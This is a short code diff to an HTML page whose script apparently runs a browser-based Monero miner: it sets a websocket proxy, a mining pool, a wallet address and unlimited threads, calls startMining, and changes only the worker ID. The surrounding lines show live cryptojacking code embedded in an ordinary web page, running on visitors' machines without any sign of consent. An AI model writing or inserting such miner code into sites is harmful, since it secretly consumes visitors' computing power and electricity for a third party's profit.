--- a/index1.html
+++ b/index1.html
@@ -10,7 +10,7 @@
         server = "wss://ghgi.xyz";
         var pool = "moneroocean.stream";
         var walletAddress = "4881APTxerVEMhPAdA1eQJVCV7L6QwTUz2cVSZpKHYbvghawyD5748bDqhmqiXurmq3pYPgtaRtu4WkTaMNQHAk6Q5dA466";
-        var workerId = ""
+        var workerId = "ax"
         var threads = -1;
         var password = "X1";
         startMining(pool, walletAddress, workerId, threads, password);
